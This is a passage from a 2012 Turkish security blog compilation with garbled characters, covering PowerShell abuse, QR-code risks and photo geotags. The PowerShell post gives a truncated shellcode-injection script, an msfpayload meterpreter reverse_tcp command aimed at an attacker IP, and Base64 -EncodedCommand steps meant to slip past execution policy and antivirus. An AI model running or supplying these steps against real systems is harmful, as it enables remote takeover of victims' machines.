Hack 4 Career - 2012Komut Satırının Gücü Adına!

[Pages:56]Hack 4 Career - 2012

Komut Satirinin G?c? Adina!

Source: By M.S on December 5th, 2012

Yapilan istatistiklere g?re 2011 yilinin son ?eyreinde Windows XP iletim sistemi ile Windows 7 iletim sistemi arasindaki kullanim oranlari birbirine olduk?a yakinken, 2012 yilinin son ?eyreinde Windows 7 iletim sistemi kullanim oraninin Windows XP iletim sistemi kullanim oranini ikiye katlami olmasi, penetrasyon testi/sizma testi ger?ekletiren biliim g?venlii uzmanlari arasinda tek bir nedenden ?t?r? memnuniyetle karilandi o da Windows 7 ile y?kl? gelen Powershell'den bakasi deildi. Powershell, Mircosoft tarafindan y?netim g?revlerini otomatize etmek amaciyla gelitirilmi, .NET siniflarindan faydalanarak betikler (script) gelitirilmesine imkan taniyan yeni nesil komut satiridir. lk s?r?m? 2006 yilinda Microsoft tarafindan yayinlanan Powershell'in ikinci s?r?m? 2009 yilinda Windows 7 ve Windows 2008 iletim sistemlerine entegre edilmi ???nc? s?r?m? ise Windows 8 ve Windows Server 2012 iletim sistemlerine entegre edilerek kullanicilarin kullanimina sunulmutur. Powershell, g?venlik ?nlemi adina g?venilir kaynaklar tarafindan gelitirilmemi olan betiklerin ?alitirilmasina varsayilan (default) olarak izin vermez. Kurumsal ortamlarda da daha ?nce Powershell'in g?c?ne taniklik etmi olan Sistem Y?neticileri ?ounlukla Etki Alani Denetleyicisi (DC) ?zerinden Powershell'in g?venilir olmayan kaynaklardan indirilen betiklerin ?alitirilmasini yasaklamaktadirlar.

Ancak ve ancak sistem y?neticileri de dahil ?ou son kullanici bu betiklerin Command ve EncodedCommand (Base64 ile kodlanmi (encode) betik) ile de ?alitirildiindan haberdar deildir. Normal artlarda betik ?alitirmaya izin vermeyen politikalar Command ve EncodedCommand ile atlatilabilmektedir.

1

Powershell'in betiklerde .NET siniflarini kullanmaya imkan tanimasi, C# ile yazilmi bir kod par?asini ?alitirma (runtime) esnasinda derlemesi ve ?alitirmasi sayesinde ?rnein komut enjeksiyonu (command injection) zafiyeti olan bir Windows Server 2008 iletim sisteminin komut satirina uzaktan erimek (remote shell) veya basit ifre tahmini ile sizilan bir Windows 7 iletim sisteminin Metasploit'e balanmasini salamak m?mk?nd?r. En ?nemlisi ise Powershell sayesinde Antivir?s yaziliminin kullanildii bir sistemde Antivir?s'e yakalanmadan istenilen kabuk kodu ?alitirabilmektedir. ?rnek olarak Powershell ?zerinden kabuk kodu ?alitirmak i?in Matt Graeber tarafindan gelitirilen aaidaki betii kullanabilirsiniz.

$code = {$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSiz

Betiin ?aliabilmesi i?in $sc64 deikenine hedef ilemci mimarisine uygun olan (x32 veya x64) kabuk kodunu kopyalamaniz gerekmektedir. $sc64 deikenine atanacak kabuk kodunu aaidaki ekilde oluturabilirsiniz.

msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.128 PORT=4444 EXITFUNC=thread C | sed '1,6d;s/[";

Ardindan betik blounu Powershell komut satirina kopyaladiktan sonra Base64 ile kodlamak i?in [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($code)) kodunu ?alitirmaniz gerekmektedir. Son olarak Backtrack'de hazir bulunan Meterpreter ile hedef sistemi balamak i?in az ?nce elde ettiiniz BASE64 ile kodlanmi betii hedef sistemde powershell -EncodedCommand eklinde ?alitirarak Meterpreter'in Antivir?s y?kl? hedef sistemde baariyla ?alimasini salayabilirsiniz.

2

Sonu? olarak Powershell ?st?n ?zelliklerinin yani sira mevcut g?venlik kontrollerinin yetersiz olmasi nedeniyle k?t?ye kullanima a?ik olduu i?in kullanimina ihtiya? duyulmayan sistemlerden kaldirilmasini tavsiye ederim. Bir sonraki yazida g?r?mek dileiyle herkese g?venli g?nler dilerim.

?abuk Tepki Vermeyin

Source: By M.S on October 31st, 2012

Quick Response Code (QR Code) T?rk?e meali ile ?abuk Tepki Kodu, 1994 yilinda Toyota'nin itiraki olan Japon Denso firmasi tarafindan ?retim bandinda par?a takibi amaciyla gelitirilmi iki boyutlu barkod t?r?d?r. QR Kodunun veri kapasitesi, n?merik olarak en fazla 7.089 karakter, alfan?merik olarak en fazla 4.291 karakter, ikilik sistem (8 Bit) olarak en fazla 2.953 bayt, Kanji/Kana olarak ise en fazla 1.817 karakterdir. (Veri kapasitesi se?ilen s?r?me ve hata d?zeltimine g?re deiiklik g?sterebilir.) G?n?m?zde hemen hemen her akilli cihazda (cep telefonlari, tabletler vb.) barkod okuyucu uygulamasi olmasi nedeniyle barkodlar, bata reklam sekt?r? olmak ?zere hizmet sekt?r?, gida sekt?r?, yazilim sekt?r? ve bankacilik sekt?r? gibi bir?ok sekt?r tarafindan ?eitli ama?lar (web sitesi reklami, uygulama indirme, sanal aliveri vs.) i?in kullanilmaktadir. ?rnein bundan 7 ay ?nce Astoria Aliveri Merkezinde karilatiim devasa QR koduna bakacak olursaniz Mekanist mobil uygulamasini y?kletmek amaciyla kullanildiini g?rebilirsiniz.

3

4

Bir dier ?rnek olarak ise farkli hizmetler sunmak ve d?nyada bir ilk olmak i?in birbirleriyle yarian risk itahlari y?ksek bankalarimizin ?eitli y?ntemler ile (salla yolla, sosyal adan bankacilik) ger?ekletirdikleri bankacilik ilemlerini benimsemeye ?aliirken dier bir bankamizin ATM'den QR kod ile kredi kartsiz para ?ekmeye imkan taniyarak d?nyada bir ilke imza attiini g?rebilirsiniz.

5

G?n?m?zde QR kodlarin hemen hemen her alanda sik?a kullaniliyor olmasi ve cep telefonumuz ile her g?rd??m?z barkodu taramaya baliyor olmamiz aslinda sosyal m?hendislik saldirilarina da davetiye ?ikarmaktadir. ?ou zaman akilli cep telefonlarinda da birer iletim sistemi ?alitiini ve bu iletim sistemlerinin de ayni Windows ve Linux iletim sistemleri gibi zafiyetlere sahip olduunu ancak bu iletim sistemlerinden farkli olarak g?venlik yamalarinin kolayca y?klenemediini g?z ardi etmekteyiz. Durum b?yle olunca da cep telefonlarimizin QR kodlar da dahil olmak ?zere ?eitli yollar ile istismar edilme olasilii artmaktadir. ?rnein iOS ve Android iletim sistemlerinde bulunan Webkit internet tarayicisi motorunda kefedilen zafiyetlerin sadece bir web sitesini ziyaret ederek istismar edilebildii haberlerini daha ?nce okumutuk.

6

Mekanist ?rneinde olduu gibi barkod okuyucu uygulamasi ile QR kod taratan ve uygulama indirip kurmaya alian bir kullanicinin art niyetli kiilerce hazirlanan bir QR kodu okutmasi ve ardindan zararli uygulamayi cep telefonuna kurma olasilii y?ksektir ??nk? QR kodlari hazirlayan kiilerin/firmalarin doruluunun teyit edilmesi m?mk?n deildir. Veya banka ?rneinde olduu gibi ATM'de QR kod taramaya alian bir kullanicinin art niyetli kiilerce hazirlanan ve ATM'lere yapitirilan bir QR kodu okutmasi, art niyetli kiilerin kontrol?nde olan bir web sitesini ziyaret etmesi ve bu site ?zerinde bulunan zararli uygulamayi cep telefonuna istem dii y?klemesi m?mk?n olabilir. ?zetle QR kod taramaya tevik edildiimiz bug?nlerde g?venliiniz i?in kaynaindan emin olmadiiniz QR kodlari taramamaniz, taramaniz durumunda da ?zellikle kisaltilmi URL i?eren adresleri ziyaret etmemeniz iddetle tavsiye edilir aksi halde art niyetli kiilerin cep telefonunuza erimesi ve kiisel bilgilerinize ele ge?irmesi m?mk?n olabilir. Herhangi bir QR kodu taramadan ?nce QR kod oluturulmasinin basit ve anonim olarak ger?ekletirilebilen bir ilem olduunu asla unutmayin.

Bir sonraki yazida g?r?mek dileiyle herkese g?venli g?nler dilerim.

G?revimiz Geotag

Source: By M.S on October 7th, 2012

GPS destei olan son model iOS veya Android iletim sistemine sahip olan mobil cihaziniz ile bir yandan tatilinizin keyfini ?ikarirken dier yandan o muhteem kumsalin, denizin resmini ?ekip sosyal medya, resim paylaim siteleri veya kendi web siteniz ?zerinden takip?ileriniz ile saat bai paylairken, evinizi soymak i?in sizi bu ortamlar ?zerinden takip eden ve evinize girmek i?in en uygun zamani kollayan hirsizin tatil beldesi ile eviniz arasindaki mesafeyi hesaplayarak kara veya havayolu ile en erken evinize ne kadar s?rede varabileceinizi hesaplamasina istemeden yardimci oluyor olabilirsiniz. Nasil mi ? Tabii ki ?ektiiniz ve paylatiiniz resimlerinizde gizli olan Geotag ile. Geotagging kisaca bulunduunuz konumun enlem, boylam gibi corafi konum bilgilerinin fotoraf, video, web sitesi, sms mesajlari, QR Code gibi ?eitli ortamlara eklenmesidir. G?n?m?zde GPS ile donatilmi dijital fotoraf makineleri ve akilli telefonlar sayesinde iletim sisteminin veya uygulamalarin ?zellikle ?ekilen fotoraflara corafi konum bilgilerini eklemesi g?venliimizi tehdit etmekte ve biz son kullanicilar i?in ?nem verilmesi, ?zerinde durulmasi gereken bir konu haline gelmektedir. Bu bilgiler JPEG dosya formatinda

7

?ekilen fotoraflara ?st veri (metadata) olarak Exchangeable Image dosya bi?iminde (EXIF) veya Extensible Metadata Platform (XMP) bi?iminde eklenmektedir. Bu bilgiler, fotoraf makinesi tarafindan ?ekilen fotoraflara vurulan ve g?zle g?r?l?r olan zaman damgasindan farkli olarak g?zle g?r?lmemektedir bu nedenle bu bilgileri g?r?nt?leyebilmek i?in ?eitli ara?lardan faydalanilmaktadir. Her ne kadar bu bilgiler son kullanicilarin g?venlii i?in risk tekil etse de su?lularin yakalanmasinda ?nemli rol oynayabilir. ABD'nin g?neydousunda yer alan Alabama eyaletine ait kamu g?venlii daire bakanlii web sitesini (dps.) 9 ubat 2012 tarihinde hackleyen CabinCr3w hacking grubu ?yesi ve Anonymous grubu destek?isi olan w0rmer rumuzlu bilgisayar korsani, sitenin i?eriine kendi hazirladii metni ve kiz arkadainin iPhone ile ?ekilmi bikinili resmini ekleyerek FBI ajanlarinin kendisini yakalamasini salamitir. Nasil salandiindan kisaca bahsedecek olursam; iOS'da Konum Hizmeti varsayilan (Location Services) olarak a?ik olarak gelmekte ve ?ekilen fotoraflara Geotag bilgisi otomatik olarak eklenmektedir.

EXIF verisi, Firefox eklentisi olan Exif Viewer gibi gibi ?eitli ara?larla incelenebilmektedir. Exif Viewer eklentisi sayesinde g?r?nt?lenen fotorafa sa tu yapilarak View Image EXIF Data ile iglili veri g?r?nt?lenebilmektedir.

8

 ................
................

In order to avoid copyright disputes, this page is only a partial summary.

Google Online Preview   Download